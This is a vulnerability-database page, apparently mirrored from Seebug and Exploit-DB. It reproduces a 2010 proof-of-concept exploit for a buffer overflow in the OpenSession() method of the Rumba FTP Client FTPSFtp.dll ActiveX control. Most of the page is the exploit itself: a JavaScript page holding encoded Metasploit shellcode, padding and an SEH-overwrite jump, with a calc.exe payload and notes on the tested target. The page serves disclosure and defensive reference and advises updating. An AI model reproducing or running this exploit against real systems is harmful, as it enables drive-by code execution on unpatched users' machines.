Lucene search
K

Rumba FTP客户端FTPSFtp.dll ActiveX控件缓冲区溢出漏洞

🗓️ 25 May 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 263 Views

Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Buffer Overflow by sinn3

Code

                                                <html>  
<head>  
<title>Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Buffer Overflow by sinn3r</title>  
</head>  
<body>  
<object classid="clsid:677A6F83-52A0-4931-8E62-EC713EE9B949" id="ftpsftp"></object>  
<script language="JavaScript">  
// http://www.metasploit.com  windows/exec cmd=calc.exe 200 bytes  
shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPM"+  
"YZEVQN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWK"+  
"RZPPRQGLKQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9"+  

            "FFQKOVQO0NL9QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN"+  

            "3LKS4LKC1XPMY1TWTGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1L"+  

            "KROLGKON5OKZPNUORF6RHOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE35"+  

            "12LSS6N3U2X3UUPDJA";  

  

eaxAlign  = unescape(  

"%58"+      //POP EAX  

"%04%0B"    //ADD AL, 0x0B  

);  


// Original fuzzed size = 13332 bytes. This POC uses 5000 bytes.  
var padding1    = unescape("%41");  
while (padding1.length < 600)  
    padding1 += unescape("%41");  
var nseh    = unescape("%EB%06%42%42"); //Short JUMP  
var seh     = unescape("%71%33%6E%74"); //0x746E3371  msls31.dll  <-- IE 6 addr  

var padding2    = unescape("%41");  

while (padding2.length < 4389-shellcode.length)  

    padding2 += unescape("%41");  

  

ftpsftp.OpenSession(padding1 + nseh + seh + eaxAlign + shellcode + padding2);  

</script>  

<pre>  

|------------------------------------------------------------------|  

|   Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Overflow   |  

|                                                                  |  

| by sinn3r - Corelan & Exploit-DB             twitter.com/_sinn3r |  

|------------------------------------------------------------------|  

  

This bug was found when I was verifying another bug for Exploit-DB. Please note that  

the latest version of FTPSFtp.dll v4.2.3.0.0 is no longer vulnerable to this, and it  

is (duh!) recommended to update your Rumba FTP to the latest version if possible.  

  

[+] Vulnerable Component = FTPSFtp.dll  

[+] Version              = 4.2.0.0  

[+] Function:            = OpenSession ( ByVal __MIDL_0011 As String ) As Object  

[+] progid               = FTPSFTPLib.SFtpApplication  

[+] Tested on            = Windows XP SP3 ENG + IE 6  

[+] Payload              = windows/exec cmd=calc.exe  

[+] Special thanks       = rAWjAW and chap0 for testing  

</pre>  
</body>  
</html>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 May 2010 00:00Current
6.9Medium risk
Vulners AI Score6.9
263